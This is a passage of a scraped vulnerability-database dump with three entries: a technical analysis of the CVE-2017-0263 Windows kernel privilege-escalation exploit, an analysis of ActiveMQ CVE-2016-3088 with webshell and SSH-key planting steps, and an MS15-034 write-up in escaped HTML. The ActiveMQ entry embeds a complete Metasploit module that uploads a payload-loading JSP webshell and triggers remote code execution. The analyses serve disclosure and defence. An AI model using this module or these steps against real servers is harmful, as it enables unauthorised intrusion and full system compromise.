The MNFreePopup function\u2014to which we will return in the following section\u2014is called. The main task of MNFreePopup is to decrement reference counters for windows related to the particular context menu. When the reference count falls to zero, this decrementing can cause the window to be destroyed.\r\n\r\nThen the xxxMNEndMenuState function checks the fMenuWindowRef flag of the pGlobalPopupMenu field to see if any references remain to the main window of the context menu. This flag is cleared upon destruction of the window contained in the spwndPopupMenu field of the context menu:\r\n```\r\n3: kd> k\r\n # ChildEBP RetAddr \r\n00 95fffa5c 81f287da win32k!xxxFreeWindow+0x847\r\n01 95fffab0 81f71252 win32k!xxxDestroyWindow+0x532\r\n02 95fffabc 81f7122c win32k!HMDestroyUnlockedObject+0x1b\r\n03 95fffac8 81f70c4a win32k!HMUnlockObjectInternal+0x30\r\n04 95fffad4 81f6e1fc win32k!HMUnlockObject+0x13\r\n05 95fffadc 81fea664 win32k!HMAssignmentUnlock+0xf\r\n06 95fffaec 81fea885 win32k!MNFreePopup+0x7d\r\n07 95fffb14 8202c3d6 win32k!xxxMNEndMenuState+0x40\r\n\r\nxxxFreeWindow+83f disasm:\r\n.text:BF89082E loc_BF89082E:\r\n.text:BF89082E and ecx, 7FFFFFFFh ; ~fMenuWindowRef\r\n.text:BF890834 mov [eax+tagPOPUPMENU.flags], ecx\r\n```\r\nAs seen above, the flag is discarded and therefore the memory occupied by the pGlobalPopupMenu field is freed up, but the pointer itself is not zeroed out. This causes a dangling pointer, which under certain circumstances can be reused.\r\n\r\nImmediately after the context menu memory is freed up, the execution flow deletes the references stored in the context menu state structure that relate to clicked windows (uButtonDownHitArea field) when the menu was active or were selected for drag-and-drop (uDraggingHitArea field).\r\n#### Exploitation method\r\nA window object in the kernel is described by a tagWND structure. There we describe the concept of kernel callbacks, which will be needed here as well. The number of active references to a window is stored in the cLockObj field of the tagWND structure.\r\n\r\nDeleting references to a window, as shown in the previous section, can cause the window itself to be destroyed. Before the window is destroyed, a WM_NCDESTROY change-of-window-state message is sent to the window.\r\n\r\nThis means that while xxxMNEndMenuState is running, control can be transferred to user application code\u2014specifically, to the window procedure of the window being destroyed. This happens when no references remain to a window whose pointer is stored in the gMenuState.uButtonDownHitArea field. \r\n```\r\n2: kd> k\r\n # ChildEBP RetAddr \r\n0138fc34 7756c4b7 q_new_SysShadow_window_proc\r\n0138fc60 77565f6f USER32!InternalCallWinProc+0x23\r\n0138fcd8 77564ede USER32!UserCallWinProcCheckWow+0xe0\r\n0138fd34 7755b28f USER32!DispatchClientMessage+0xcf\r\n0138fd64 77666bae USER32!__fnNCDESTROY+0x26\r\n0138fd90 77564f21 ntdll!KiUserCallbackDispatcher+0x2e \r\n95fe38f8 81f56d86 nt!KeUserModeCallback\r\n95fe3940 81f5c157 win32k!xxxSendMessageToClient+0x175\r\n95fe398c 81f5c206 win32k!xxxSendMessageTimeout+0x1cf\r\n95fe39b4 81f2839c win32k!xxxSendMessage+0x28\r\n95fe3a10 81f2fb00 win32k!xxxDestroyWindow+0xf4\r\n95fe3a24 81f302ee win32k!xxxRemoveShadow+0x3e\r\n95fe3a64 81f287da win32k!xxxFreeWindow+0x2ff\r\n95fe3ab8 81f71252 win32k!xxxDestroyWindow+0x532\r\n95fe3ac4 81f7122c win32k!HMDestroyUnlockedObject+0x1b\r\n95fe3ad0 81f70c4a win32k!HMUnlockObjectInternal+0x30\r\n95fe3adc 81f6e1fc win32k!HMUnlockObject+0x13\r\n95fe3ae4 81fe4162 win32k!HMAssignmentUnlock+0xf\r\n95fe3aec 81fea8c3 win32k!UnlockMFMWFPWindow+0x18\r\n95fe3b14 8202c3d6 win32k!xxxMNEndMenuState+0x7e \r\n```\r\nFor example, in the call stack shown above, the WM_NCDESTROY message is handled by the window procedure for the SysShadow window class. Windows of this class are designed to provide shadowing and are usually destroyed together with the windows for which they are shadowing.\r\nNow let's see the most interesting part of how this window message is handled, in the form that was found in the malware sample taken from a .docx phishing attachment:\r\n\r\n\r\nWhen the attacker takes control, the first matter of business is to occupy the now-free memory that was just occupied by gMenuState.pGlobalPopupMenu, in order to reuse this pointer later. Attempting to allocate the indicated memory block, the exploit performs a large number of SetClassLongW calls, thus setting a specially formed menu name for window classes that have been specially created for this purpose:\r\n```\r\n2: kd> k\r\n # ChildEBP RetAddr \r\n00 9f74bafc 81f240d2 win32k!memcpy+0x33\r\n01 9f74bb3c 81edadb1 win32k!AllocateUnicodeString+0x6b\r\n02 9f74bb9c 81edb146 win32k!xxxSetClassData+0x1d1\r\n03 9f74bbb8 81edb088 win32k!xxxSetClassLong+0x39\r\n04 9f74bc1c 82892db6 win32k!NtUserSetClassLong+0xc8\r\n05 9f74bc1c 77666c74 nt!KiSystemServicePostCall\r\n06 0136fac0 7755658b ntdll!KiFastSystemCallRet\r\n07 0136fac4 775565bf user32!NtUserSetClassLong+0xc\r\n08 0136fafc 10001a52 user32!SetClassLongW+0x5e\r\n09 0136fc34 7756c4b7 q_new_SysShadow_window_proc (call SetClassLongW)\r\n```\r\n\r\nAfter the memory is occupied, the next stage begins. The exploit accesses the NtUserMNDragLeave system procedure, which performs a nested call of the xxxMNEndMenuState function. Clearing of the gMenuState structure starts again:\r\n```\r\n2: kd> k\r\n # ChildEBP RetAddr \r\n00 9f74bbf0 8202c3d6 win32k!xxxMNEndMenuState\r\n01 9f74bc04 8202c40e win32k!xxxUnlockMenuStateInternal+0x2e\r\n02 9f74bc14 82015672 win32k!xxxUnlockAndEndMenuState+0xf\r\n03 9f74bc24 82001728 win32k!xxxMNDragLeave+0x45\r\n04 9f74bc2c 82892db6 win32k!NtUserMNDragLeave+0xd\r\n05 9f74bc2c 100010a9 nt!KiSystemServicePostCall\r\n06 0136fafc 10001a84 q_exec_int2e (int 2Eh)\r\n07 0136fc34 7756c4b7 q_new_SysShadow_window_proc (call q_exec_int2e)\r\n```\r\nAs described in the previous section, the procedure starts by deinitializing the pGlobalPopupMenu field; this process is performed by the MNFreePopup call, which decrements the reference counters for windows contained in various fields of tagPOPUPMENU. After the prior step, the content of this structure is now controlled by the attacker. So when the described chain of actions is performed, the attacker gets a decrement primitive to an arbitrary kernel address.\r\n\r\nIn this exploit, an address is inserted in the tagPOPUPMENU.spwndPrevPopup field and the primitive is used to decrement the field for flags of one of the windows, causing that window to be marked with the flag bServerSideProc, which means that its window procedure is run in the kernel.\r\nAs the code shows, immediately after returning from NtUserMNDragLeave, a message is sent to the window by a SendMessage call, causing arbitrary kernel code execution. At this stage, the attacker usually steals a system process token to obtain system privileges. Indeed, this is what happened in the exploit here.\r\n\r\n#### In conclusion\r\nWhat are the salient points of the exploit? The most common cause of vulnerabilities in the win32k.sys library is access to callbacks in user space when any kernel structures are in an intermediate stage when a transaction is changing them. Setting the bServerSideProc flag for a window is also a popular method for kernel code execution. In addition, the most convenient method to leverage kernel code execution for privilege escalation is to copy a reference to a system token.\r\n\r\nIn that sense, the exploit looks rather mundane. At the same time many of the nuances have been simplified or purposefully omitted from this discussion.\r\n\r\nFor example, we did not dwell on the exact appearance of the context menu or menu-related actions that cause the necessary state of the flags and fields of the win32k!gMenuState variable during execution of the xxxMNEndMenuState procedure. Left unmentioned was the fact that the menu names set during SetClassLong calls should, on the one hand, be a Unicode string with no null characters but, on the other hand, be a legitimate tagPOPUPMENU structure. This also means that the address of the window in the kernel (to which the decrement field will refer) must not contain any wchar_t null characters. These are just a few examples from a rather long list. \r\n\r\nAs for the update that fixes the vulnerability, a quick glance shows that the buffer addressed by the gMenuState.pGlobalPopupMenu field is now freed closer to the end of the xxxMNEndMenuState function, much later after the MNFreePopup and UnlockMFMWPWindow calls, and is accompanied by zeroing-out of the pointer. Thus the patch addresses two causes whose simultaneous presence caused the vulnerability to occur.", "cvss3": {}, "published": "2017-05-19T00:00:00", "type": "seebug", "title": "Win32k Elevation of Privilege Vulnerability(CVE-2017-0263)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0262", "CVE-2017-0263"], "modified": "2017-05-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93116", "id": "SSV:93116", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T11:56:57", "description": "Author: The **know Chong Yu 404 laboratory**\n\n#### 1\\. Background overview\n\nActiveMQ is an Apache Software Foundation under an open source message-driven middleware software. Jetty is an open source servlet container, it is based on Java web container such as JSP and servlet to provide the running environment. ActiveMQ 5.0 and later versions the default integrated jetty. After the start to provide a monitoring ActiveMQ Web application.\n\n2016 4 November 14, the overseas security researchers Simon Zuckerbraun exposure Apache ActiveMQ Fileserver there are multiple security vulnerabilities allowing a remote attacker to use malicious code to replace the Web application on an affected system to remote code execution\uff08CVE-2016-3088\uff09\u3002\n\n#### 2\\. Principles of analysis\n\nActiveMQ in the FileServer service allows the user through the HTTP PUT method to upload a file to a specified directory,download [ActiveMQ 5.7.0 source code](<http://archive.apache.org/dist/activemq/apache-activemq/5.7.0/activemq-parent-5.7.0-source-release.zip>) , you can see the background processing PUT the key code is as follows\n\n\n\nThe user can upload a file to a specified directory, the path in the `conf/jetty.xml ` in the definition, as follows\n\n\n\nInterestingly, we forged a special upload path, you can burst an absolute path\n\n\n\nAlong the PUT method to track, you can see the call to the following function\n\n\n\nAt the same time see the background processing to MOVE the key code is as follows, You can see the method is not for the purpose of path any restrictions or filtering.\n\n\n\nThus, we can construct a PUT request to upload a webshell to the fileserver directory, and then by the Move method to move it to have execute permissions for the admin/ directory.\n\n#### 3\\. Exploit a variety of poses\n\nAccording to the above vulnerability principle, we can think of a variety of the use of poses.\n\nNote: the following results are in the ActiveMQ 5.7.0 in the reproduction, the reproduction process of the MOVE method use is very unstable.\n\n * Upload Webshell way\n\nFirst PUT a Jsp Webshell to the fileserver directory\n\n\n\nIn the fileserver/ directory Webshell and no execute permissions\n\n\n\nProof about the absolute path\n\n\n\nThen use the MOVE method to the Webshell moved into the admin/ directory, you can also use relative paths\n\n\n\nVisit http://localhost:8161/admin/1. jsp? cmd=ls, the command successfully executes, the results are as follows\n\n\n\n \n\n\n * Upload the SSH public key mode\n\nSince can be arbitrary file upload and moving, very natural can think to upload our ssh public key, enabling SSH login.\n\nFirst generate the key pair. If it's already there then not required\n\n\n\nThen upload, move to the`/root/. ssh/`and rename to `authorized_keys`\n\n \n\nDirectly after the ssh login.\n\n\n\n#### 4\\. Vulnerability\n\nThe vulnerability affects versions: Apache ActiveMQ 5. x ~ 5.14.0\n\nIn [ZoomEye ](<https://www.zoomeye.org>) with date and ActiveMQ as a key to retrieve, respectively, the detection of the 2015 1 month 1 day vulnerability before the outbreak of the one year and 2017 year 1 month 1 day vulnerability after the outbreak of the one year Internet on ActiveMQ the total amount of the case, as follows.\n\n \n\nYou can see that ActiveMQ in the number of vulnerabilities the outbreak of the front and rear there is a very substantial reduction, from which we can generally guess the vulnerabilities after the outbreak of the many ActiveMQ Web service is restricted from public access.\n\n#### 5\\. Vulnerability protection programme\n\n1, The ActiveMQ Fileserver function in 5.14.0 and later versions has been removed. Users are recommended to upgrade to 5.14.0 and later versions.\n\n2, by removing `conf\\jetty.xml ` the following configuration to disable the ActiveMQ Fileserver function\n\n\n\n#### 6\\. Reference links\n\n[1] http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt \n[2] https://www.seebug.org/vuldb/ssvid-96268\n", "cvss3": {}, "published": "2017-07-04T00:00:00", "type": "seebug", "title": "Apache ActiveMQ Fileserver remote code execution vulnerability(CVE-2016-3088)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-3088"], "modified": "2017-07-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96268", "id": "SSV:96268", "sourceData": "\n ##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ActiveMQ web shell upload',\r\n 'Description' => %q(\r\n The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0\r\n allows remote attackers to upload and execute arbitrary files via an\r\n HTTP PUT followed by an HTTP MOVE request.\r\n ),\r\n 'Author' => [ 'Ian Anderson <andrsn84[at]gmail.com>', 'Hillary Benson <1n7r1gu3[at]gmail.com>' ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-3088' ],\r\n [ 'URL', 'http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => %w{ java linux win },\r\n 'Targets' =>\r\n [\r\n [ 'Java Universal',\r\n {\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA\r\n }\r\n ],\r\n [ 'Linux',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Windows',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => \"Jun 01 2016\",\r\n 'DefaultTarget' => 0))\r\n register_options(\r\n [\r\n OptString.new('BasicAuthUser', [ true, 'The username to authenticate as', 'admin' ]),\r\n OptString.new('BasicAuthPass', [ true, 'The password for the specified username', 'admin' ]),\r\n OptString.new('JSP', [ false, 'JSP name to use, excluding the .jsp extension (default: random)', nil ]),\r\n OptString.new('AutoCleanup', [ false, 'Remove web shells after callback is received', 'true' ]),\r\n Opt::RPORT(8161)\r\n ])\r\n register_advanced_options(\r\n [\r\n OptString.new('UploadPath', [false, 'Custom directory into which web shells are uploaded', nil])\r\n ])\r\n end\r\n\r\n def jsp_text(payload_name)\r\n %{\r\n <%@ page import=\"java.io.*\"\r\n %><%@ page import=\"java.net.*\"\r\n %><%\r\n URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath(\"./#{payload_name}.jar\")).toURI().toURL()});\r\n Class c = cl.loadClass(\"metasploit.Payload\");\r\n c.getMethod(\"main\",Class.forName(\"[Ljava.lang.String;\")).invoke(null,new java.lang.Object[]{new java.lang.String[0]});\r\n %>}\r\n end\r\n\r\n def exploit\r\n jar_payload = payload.encoded_jar.pack\r\n payload_name = datastore['JSP'] || rand_text_alpha(8 + rand(8))\r\n host = \"#{datastore['RHOST']}:#{datastore['RPORT']}\"\r\n @url = datastore['SSL'] ? \"https://#{host}\" : \"http://#{host}\"\r\n paths = get_upload_paths\r\n paths.each do |path|\r\n if try_upload(path, jar_payload, payload_name)\r\n break handler if trigger_payload(payload_name)\r\n print_error('Unable to trigger payload')\r\n end\r\n end\r\n end\r\n\r\n def try_upload(path, jar_payload, payload_name)\r\n ['.jar', '.jsp'].each do |ext|\r\n file_name = payload_name + ext\r\n data = ext == '.jsp' ? jsp_text(payload_name) : jar_payload\r\n move_headers = { 'Destination' => \"#{@url}#{path}#{file_name}\" }\r\n upload_uri = normalize_uri('fileserver', file_name)\r\n print_status(\"Uploading #{move_headers['Destination']}\")\r\n register_files_for_cleanup \"#{path}#{file_name}\" if datastore['AutoCleanup'].casecmp('true')\r\n return error_out unless send_request('PUT', upload_uri, 204, 'data' => data) &&\r\n send_request('MOVE', upload_uri, 204, 'headers' => move_headers)\r\n @trigger_resource = /webapps(.*)/.match(path)[1]\r\n end\r\n true\r\n end\r\n\r\n def get_upload_paths\r\n base_path = \"#{get_install_path}/webapps\"\r\n custom_path = datastore['UploadPath']\r\n return [normalize_uri(base_path, custom_path)] unless custom_path.nil?\r\n [ \"#{base_path}/api/\", \"#{base_path}/admin/\" ]\r\n end\r\n\r\n def get_install_path\r\n properties_page = send_request('GET', \"#{@url}/admin/test/systemProperties.jsp\").body\r\n match = properties_page.tr(\"\\n\", '@').match(/activemq\\.home<\\/td>@\\s*<td>([^@]+)<\\/td>/)\r\n return match[1] unless match.nil?\r\n end\r\n\r\n def send_request(method, uri, expected_response = 200, opts = {})\r\n opts['headers'] ||= {}\r\n opts['headers']['Authorization'] = basic_auth(datastore['BasicAuthUser'], datastore['BasicAuthPass'])\r\n opts['headers']['Connection'] = 'close'\r\n r = send_request_cgi(\r\n {\r\n 'method' => method,\r\n 'uri' => uri\r\n }.merge(opts)\r\n )\r\n return false if r.nil? || expected_response != r.code.to_i\r\n r\r\n end\r\n\r\n def trigger_payload(payload_name)\r\n send_request('POST', @url + @trigger_resource + payload_name + '.jsp')\r\n end\r\n\r\n def error_out\r\n print_error('Upload failed')\r\n @trigger_resource = nil\r\n false\r\n end\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96268", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:32:41", "description": "<h4><strong></strong>\u4e00\u3001\u6f0f\u6d1e\u6982\u8981<strong></strong></h4><p> </p><p>2015\u5e7404\u670814\u65e5\uff0c\u5fae\u8f6f\u53d1\u5e03\u4e25\u91cd\u7ea7\u522b\u7684\u5b89\u5168\u516c\u544a MS15-034\uff0c\u7f16\u53f7\u4e3a CVE-2015-1635\uff0c\u636e\u79f0\u5728 Http.sys \u4e2d\u7684\u6f0f\u6d1e\u53ef\u80fd\u5141\u8bb8\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u3002</p><ul><li><strong> \u6f0f\u6d1e\u63cf\u8ff0</strong></li></ul><p>Http.sys \u662f\u4e00\u4e2a\u4f4d\u4e8e Windows \u64cd\u4f5c\u7cfb\u7edf\u6838\u5fc3\u7ec4\u4ef6\uff0c\u80fd\u591f\u8ba9\u4efb\u4f55\u5e94\u7528\u7a0b\u5e8f\u901a\u8fc7\u5b83\u63d0\u4f9b\u7684\u63a5\u53e3\uff0c\u4ee5 Http \u534f\u8bae\u8fdb\u884c\u4fe1\u606f\u901a\u8baf\u3002\u5fae\u8f6f\u5728 Windows 2003 Server \u91cc\u5f15\u8fdb\u4e86\u65b0\u7684 HTTP API \u548c\u5185\u6838\u6a21\u5f0f\u9a71\u52a8 Http.sys\uff0c\u76ee\u7684\u662f\u4f7f\u57fa\u4e8e Http \u670d\u52a1\u7684\u7a0b\u5e8f\u66f4\u6709\u6548\u7387\u3002\u5176\u5b9e\u5728 Windows XP \u5b89\u88c5 SP2 \u540e\uff0cHttp.sys \u5df2\u7ecf\u51fa\u73b0\u5728\u7cfb\u7edf\u91cc\u4e86\uff0c\u4f46\u4e8b\u5b9e\u4e0a\u64cd\u4f5c\u7cfb\u7edf\u5e76\u6ca1\u6709\u771f\u7684\u4f7f\u7528\u8fd9\u4e2a\u5185\u6838\u7ea7\u9a71\u52a8\uff0c\u800c XP \u4e0a\u81ea\u5e26\u7684 IIS 5.1 \u4e5f\u6ca1\u6709\u4f7f\u7528 HTTP API\u3002</p><p>\u4ece\u66dd\u51fa\u7684 POC \u6765\u770b\uff0c\u6b64\u6f0f\u6d1e\u662f\u4e00\u4e2a\u6574\u6570\u6ea2\u51fa\u7c7b\u578b\u7684\u6f0f\u6d1e\uff0c\u5fae\u8f6f\u5b89\u5168\u516c\u544a\u79f0\u6700\u5927\u5b89\u5168\u5f71\u54cd\u662f\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u3002</p><ul><li><strong>\u6f0f\u6d1e\u5f71\u54cd</strong></li></ul><p>\u53d7\u5f71\u54cd\u7248\u672c\uff1a</p><p>IIS 7.0\u4ee5\u4e0a\u7684Windows 7/8/8.1\u548cWindows Server 2008 R2/Server 2012/Server 2012 R2\u7b49\u64cd\u4f5c\u7cfb\u7edf\u3002</p><ul><li><strong>\u6f0f\u6d1e\u5206\u6790</strong></li></ul><p>\u6839\u636e\u8865\u4e01\u6bd4\u8f83\u53d1\u73b0\uff0cPOC \u4e2d\u63d0\u5230\u7684\u4ee3\u7801\u51fa\u73b0\u5728 UlpParseRange \u51fd\u6570\u4e2d\u4fee\u6539\u7684\u90e8\u5206\u3002</p><p>\u5728\u672a\u6253\u8865\u4e01\u7684 Http.sys \u6587\u4ef6\u7684 UlpParseRange \u51fd\u6570\u4e2d\uff0c\u4ee3\u7801\u5982\u4e0b\u3002</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.171.jpg\" alt=\"4.171\" height=\"294\" width=\"358\"></p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.172.jpg\" alt=\"4.172\" height=\"35\" width=\"536\"></p><p>\u53ef\u4ee5\u770b\u5230\uff0c\u5728\u8ba1\u7b97 64 \u4f4d\u6574\u6570\u65f6\u76f4\u63a5\u8fdb\u884c\u4e86\u8fd0\u7b97\uff0c\u6ca1\u6709\u8fdb\u884c\u5fc5\u8981\u7684\u6574\u6570\u6ea2\u51fa\u68c0\u67e5\u3002</p><p>\u800c\u5728\u6253\u8865\u4e01\u7684 Http.sys \u6587\u4ef6\u7684 UlpParseRange \u51fd\u6570\u4e2d\uff0c\u4fee\u6539\u4ee3\u7801\u5982\u4e0b\u3002</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.173.jpg\" alt=\"4.173\" height=\"284\" width=\"340\"></p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.174.jpg\" alt=\"4.174\" height=\"20\" width=\"649\"></p><p>\u7528 RtlULongLongAdd \u51fd\u6570\u6765\u8ba1\u7b97 Range \u8303\u56f4\u957f\u5ea6 v18\uff0c\u8fd9\u4e2a\u51fd\u6570\u4e2d\u662f\u505a\u4e86\u6574\u6570\u6ea2\u51fa\u68c0\u67e5\u7684\u3002</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.175.jpg\" alt=\"4.175\" height=\"323\" width=\"792\"></p><p>\u518d\u770b\u4e00\u4e0b\u5bf9 RtlULongLongAdd \u51fd\u6570\u7684\u8c03\u7528\u60c5\u51b5\u3002</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.176.jpg\" alt=\"4.176\" height=\"139\" width=\"690\"></p><p>\u5728\u672a\u6253\u8865\u4e01\u7684 Http.sys \u6587\u4ef6\u4e2d\u53ea\u6709 1 \u5904\u8c03\u7528\u4e86 RtlULongLongAdd \u51fd\u6570\u3002</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.177.jpg\" alt=\"4.177\" height=\"333\" width=\"393\"></p><p>\u800c\u5728\u6253\u8865\u4e01\u7684 Http.sys \u6587\u4ef6\u4e2d\u603b\u5171\u6709 13 \u5904\u8c03\u7528\u4e86 RtlULongLongAdd \u51fd\u6570\u8fdb\u884c\u6574\u6570\u6ea2\u51fa\u68c0\u67e5\uff0c\u8bf4\u660e\u6709\u6f0f\u6d1e\u7684\u7cfb\u7edf\u4e2d\u53ef\u80fd\u6709\u591a\u4e2a\u5904\u7406\u6d41\u7a0b\u4f1a\u6d89\u53ca\u5230\u6574\u6570\u6ea2\u51fa\u9020\u6210\u7684\u5b89\u5168\u95ee\u9898\u3002</p><p>\u901a\u8fc7\u8865\u4e01\u6bd4\u8f83\u786e\u5b9a\u4e86\u4fee\u6539\u8fc7\u7684\u51fd\u6570\u5982\u4e0b\u3002</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.178.jpg\" alt=\"4.178\" height=\"202\" width=\"701\"></p><p>\u7ecf\u8fc7\u5206\u6790\u53d1\u73b0\uff0cUlAdjustRangesToContentSize \u51fd\u6570\u4e2d\u7684\u6574\u6570\u6ea2\u51fa\u70b9\uff0c\u624d\u662f\u5bfc\u81f4\u6f0f\u6d1e\u80fd\u53d1\u6325\u4f5c\u7528\u7684\u5173\u952e\u6d41\u7a0b\u3002</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.179.jpg\" alt=\"4.179\" height=\"295\" width=\"452\"></p><p> </p><p>\u8fd9\u6bb5\u4ee3\u7801\u8fd8\u662f\u91c7\u7528\u4e86\u76f4\u63a5\u8fd0\u7b97 64 \u4f4d\u6574\u6570\u7684\u65b9\u5f0f\uff0c\u6ca1\u6709\u68c0\u67e5\u662f\u5426\u6ea2\u51fa\uff0c\u5728\u8865\u4e01\u6587\u4ef6\u4e2d\u66ff\u6362\u4e3a\u8c03\u7528 RtlULongLongAdd \u51fd\u6570\u3002</p><p>\u8fd9\u90e8\u5206\u4ee3\u7801\u7684\u529f\u80fd\u662f\u5224\u65ad\u83b7\u53d6\u6587\u4ef6\u504f\u79fb\u91cf\u7684\u8303\u56f4\uff0c\u662f\u5426\u4f1a\u8d85\u8fc7\u8bf7\u6c42\u7f13\u5b58\u6587\u4ef6\u7684\u6570\u636e\u957f\u5ea6\uff0c\u5982\u679c\u8d85\u51fa\u5c31\u628a\u8bfb\u53d6\u957f\u5ea6 \u4fee\u6539\u4e3a\u5408\u9002\u7684\u5927\u5c0f\uff0c\u9632\u6b62\u8d8a\u754c\u8bbf\u95ee\u6570\u636e\u3002\u4f46\u662f\u7531\u4e8e\u53d1\u751f\u4e86\u6574\u6570\u6ea2\u51fa\uff0c\u4f7f\u5f97\u5224\u65ad\u8d8a\u754c\u7684\u4ee3\u7801\u5931\u6548\uff0c\u8fd9\u6837\u5c31\u4e0d\u4f1a\u4fee\u6539\u8bfb\u53d6\u957f\u5ea6\uff0c\u9020\u6210\u7528\u53ef\u63a7\u7684\u957f\u5ea6\u503c\u8d8a\u754c\u8bbf\u95ee\u6570\u636e\u3002</p><p>\u4f46\u662f\u5982\u679c\u8981\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u8fd8\u9700\u8981\u4e00\u4e9b\u5fc5\u8981\u7684\u6761\u4ef6\uff0c\u5177\u4f53\u7ec6\u8282\u6709\u5f85\u8fdb\u4e00\u6b65\u5206\u6790\u3002</p><ul><li><strong>\u6f0f\u6d1e\u9a8c\u8bc1</strong></li></ul><p>\u53ef\u4ee5\u4f7f\u7528 PoC \u533a\u57df\u4e2d Python \u7a0b\u5e8f\u5bf9\u7cfb\u7edf\u8fdb\u884c\u6f0f\u6d1e\u68c0\u6d4b\u3002</p><p>\u5982\u679c\u6253\u5370\u51fa\u201cLooks VULN\u201d\uff0c\u8bf4\u660e\u7cfb\u7edf\u5b58\u5728\u6f0f\u6d1e\u3002</p><h4><strong></strong>\u4e8c\u3001ZoomEye \u5e94\u6025\u6982\u8981<strong></strong></h4><p> </p><p>\u77e5\u9053\u521b\u5b87\u5b89\u5168\u7814\u7a76\u56e2\u961f\u901a\u8fc7\u7f51\u7edc\u7a7a\u95f4\u641c\u7d22\u5f15\u64ce ZoomEye \u8fdb\u884c\u5168\u7f51\u641c\u7d22\uff0c\u5f97\u51fa\u76ee\u524d\u7f51\u7edc\u7a7a\u95f4\u4e2d\u53ef\u80fd\u53d7\u5f71\u54cd\u7f51\u7ad9\u6240\u4f7f\u7528 IIS \u7248\u672c\u6bd4\u4f8b\u5982\u4e0b\u6240\u793a\uff1a</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.16%E9%85%8D%E5%9B%BE1.png\" alt=\"4.16\u914d\u56fe1\" height=\"323\" width=\"575\"></p><p> </p><p>\u25b2\u53d7\u5a01\u80c1\u7f51\u7ad9\u4f7f\u7528\u7248\u672c\u6bd4\u4f8b</p><p><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/04/4.16%E9%85%8D%E5%9B%BE2.png\" alt=\"4.16\u914d\u56fe2\" height=\"509\" width=\"672\"></p><p>\u25b2\u5168\u56fd\u7f51\u7ad9\u53d7 IIS \u6f0f\u6d1e\u5f71\u54cd\u5730\u57df\u5206\u5e03\u60c5\u51b5</p><p>\u53e6\u5916\uff0cZoomEye \u641c\u7d22\u7ed3\u679c\u663e\u793a\uff0c\u5168\u56fd\u53d7\u6f0f\u6d1e\u5a01\u80c1\u7684\u7f51\u7ad9\u603b\u6570\u8fbe 795,317 \u4e2a\uff0c\u8d85\u8fc7\u6211\u56fd\u7f51\u7ad9\u603b\u6570\u7684\u4e94\u5206\u4e4b\u4e00\uff0c\u4ece\u533a\u57df\u5206\u5e03\u6765\u770b\uff0c\u6392\u5728\u9996\u4f4d\u7684\u5317\u4eac\u5730\u533a\u5171 276,39 \u4e2a\uff0c\u5bf9\u6f0f\u6d1e\u7684\u4fee\u590d\u5de5\u4f5c\u523b\u4e0d\u5bb9\u7f13\u3002\u8bf7\u7f51\u7edc\u7ba1\u7406\u5458\u5c3d\u5feb\u6253\u8865\u4e01\u4fee\u590d\uff0c\u5b98\u65b9\u8865\u4e01\u4e0b\u8f7d\u5730\u5740\uff1a</p><ul><li><a href=\"https://support.microsoft.com/zh-cn/kb/3042553\">https://support.microsoft.com/zh-cn/kb/3042553</a>\u3002</li></ul><h4>\u4e09\u3001\u4fee\u590d\u5efa\u8bae</h4><p>\u901a\u8fc7 Windows \u66f4\u65b0\u673a\u5236\uff0c\u9009\u62e9 KB3042553 \u5b89\u5168\u66f4\u65b0\u8fdb\u884c\u7cfb\u7edf\u5347\u7ea7\u3002</p><p>\u6b64\u6f0f\u6d1e\u5728\u7ebf\u9a8c\u8bc1\u5730\u5740\uff1a<a href=\"http://www.scanv.com/lab\" target=\"_blank\">http://www.scanv.com/lab</a></p><h4><strong></strong>\u56db\u3001\u76f8\u5173\u8d44\u6e90\u94fe\u63a5<strong></strong></h4><ul><li><a href=\"https://technet.microsoft.com/zh-cn/library/security/ms15-034\">https://technet.microsoft.com/zh-cn/library/security/ms15-034</a></li></ul><p>\u5e94\u6025\u62a5\u544a\u4e0b\u8f7d\uff1a<a target=\"_blank\" 